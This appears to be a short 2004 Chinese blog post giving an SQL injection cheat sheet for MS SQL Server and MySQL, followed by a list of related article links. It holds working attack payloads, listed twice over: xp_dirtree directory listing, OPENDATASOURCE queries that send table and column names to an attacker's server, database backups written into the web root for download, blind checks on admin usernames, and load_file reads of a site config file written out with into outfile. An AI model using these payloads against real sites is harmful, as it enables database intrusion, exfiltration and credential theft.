Some useful techniques in sql injection [个人总结简洁版]
2004-07-16 16:57
549 查看
1.a. create table dirs (dir varchar(100),dirid int)
insert dirs exec xp_dirtree '想获取该目录的磁盘'’
declare @dir varchar(500)
-------
b. set @dir=''
select @dir=@dir+dir+':'+ltrim(str(dirid))+'|' from dirs where dir>@dir
select 1+@dir
------or
alter table dirs add num int identity constraint num primary key
select top 1 dir from ( select top[1,2,3...] dir,num from dirs) T order by num desc
c. create table tmptable ( name char(200),id int not null)
insert into opendatasource('sqloledb','driver={sql server};server=yourip;network=sbmssocn;address=yourip,1433;uid=guest;pwd='';database=master').master.dbo.tmptable select [name],[id] from sysobjects where xtype='U' --
select * into [tmpcolumns]from syscolumns where 1=2
insert into opendatasource('sqloledb','driver={sql server};server=yourip;network=sbmssocn;address=yourip,1433;uid=guest;pwd='';database=master').master.dbo.tmpcolumns select name from syscolumns where id=' the id of table you wanna know'
declare @a sysname; set @a=db_name();backup database @a to disk='网站的绝对路径';--// 例如:e:/web/down.bak;--
2.
select top 1 name from (select top 2 name,id from sysobjects where xtype='U') T order by id desc
select top 2 name,id from sysobjects where xtype='U'
select db_id('master')
select db_name(17)
select col_name(oject_id('你要获取字段的表名'),[1,2,..])
select current_user,user,user_name(),system_user
DECLARE m scroll CURSOR FOR
select name from sysobjects where xtype='U'
open m
DEALLOCATE m
fetch first from m
3.http://www.itlearner.com/work/hexsql.asp //a not bad link to encode charset
http://whois.webhosting.info
4.select case 1+1 when 1 then '1' else '0' end;
select top 1 iif(asc(mid(username,1,1))>96,1,username) from admin)>0
select if(STRCMP('net0r','netor1'),'not netor','is netor');
SELECT 1,1,1,1,1,load_file(char(47,104,111,109,101,47,52,110,103,101,108,47,102,111,114,117,109,47,97,100,109,105,110,47,99,111,110,102,105,103,46,112,104,112)) FROM user WHERE userid=1 into outfile 'c:/web/cfg.txt'
insert dirs exec xp_dirtree '想获取该目录的磁盘'’
declare @dir varchar(500)
-------
b. set @dir=''
select @dir=@dir+dir+':'+ltrim(str(dirid))+'|' from dirs where dir>@dir
select 1+@dir
------or
alter table dirs add num int identity constraint num primary key
select top 1 dir from ( select top[1,2,3...] dir,num from dirs) T order by num desc
c. create table tmptable ( name char(200),id int not null)
insert into opendatasource('sqloledb','driver={sql server};server=yourip;network=sbmssocn;address=yourip,1433;uid=guest;pwd='';database=master').master.dbo.tmptable select [name],[id] from sysobjects where xtype='U' --
select * into [tmpcolumns]from syscolumns where 1=2
insert into opendatasource('sqloledb','driver={sql server};server=yourip;network=sbmssocn;address=yourip,1433;uid=guest;pwd='';database=master').master.dbo.tmpcolumns select name from syscolumns where id=' the id of table you wanna know'
declare @a sysname; set @a=db_name();backup database @a to disk='网站的绝对路径';--// 例如:e:/web/down.bak;--
2.
select top 1 name from (select top 2 name,id from sysobjects where xtype='U') T order by id desc
select top 2 name,id from sysobjects where xtype='U'
select db_id('master')
select db_name(17)
select col_name(oject_id('你要获取字段的表名'),[1,2,..])
select current_user,user,user_name(),system_user
DECLARE m scroll CURSOR FOR
select name from sysobjects where xtype='U'
open m
DEALLOCATE m
fetch first from m
3.http://www.itlearner.com/work/hexsql.asp //a not bad link to encode charset
http://whois.webhosting.info
4.select case 1+1 when 1 then '1' else '0' end;
select top 1 iif(asc(mid(username,1,1))>96,1,username) from admin)>0
select if(STRCMP('net0r','netor1'),'not netor','is netor');
SELECT 1,1,1,1,1,load_file(char(47,104,111,109,101,47,52,110,103,101,108,47,102,111,114,117,109,47,97,100,109,105,110,47,99,111,110,102,105,103,46,112,104,112)) FROM user WHERE userid=1 into outfile 'c:/web/cfg.txt'
相关文章推荐
- QIBO CMS SQL Injection Via Variable Uninitialization In \member\special.php
- Some useful tricks for Virtual (and normal) hosts in Apache’s httpd.conf
- study how to express some SQL query in english------OUT JOIN
- Methods of quick exploitation of blind SQL Injection Vulnerabilities in Oracle
- sql个人总结2
- Oracle SQL中的 IN 和 EXSITS 区别总结
- LINQ to Entities 实现sql 关键字"In"方式总结
- Some useful tools in web development
- Advanced SQL Injection In SQL Server Applications
- Sql Injection in DB2数据库
- LINQ to Entities 实现sql 关键字"In"方式总结
- Some useful tools in web development
- In some cases useful info about processes that use……
- ORACLE_LATERAL-SQL-INJECTION_个人见解
- some hopefully useful tips in Aj…
- DTS Programming Techniques Used in Microsoft SQL Server Accelerator for Business Intelligence
- Oracle SQL中的IN 和 EXSITS区别总结
- LINQ to Entities 实现sql 关键字"In"方式总结
- sql中exsists, in, all, any, some,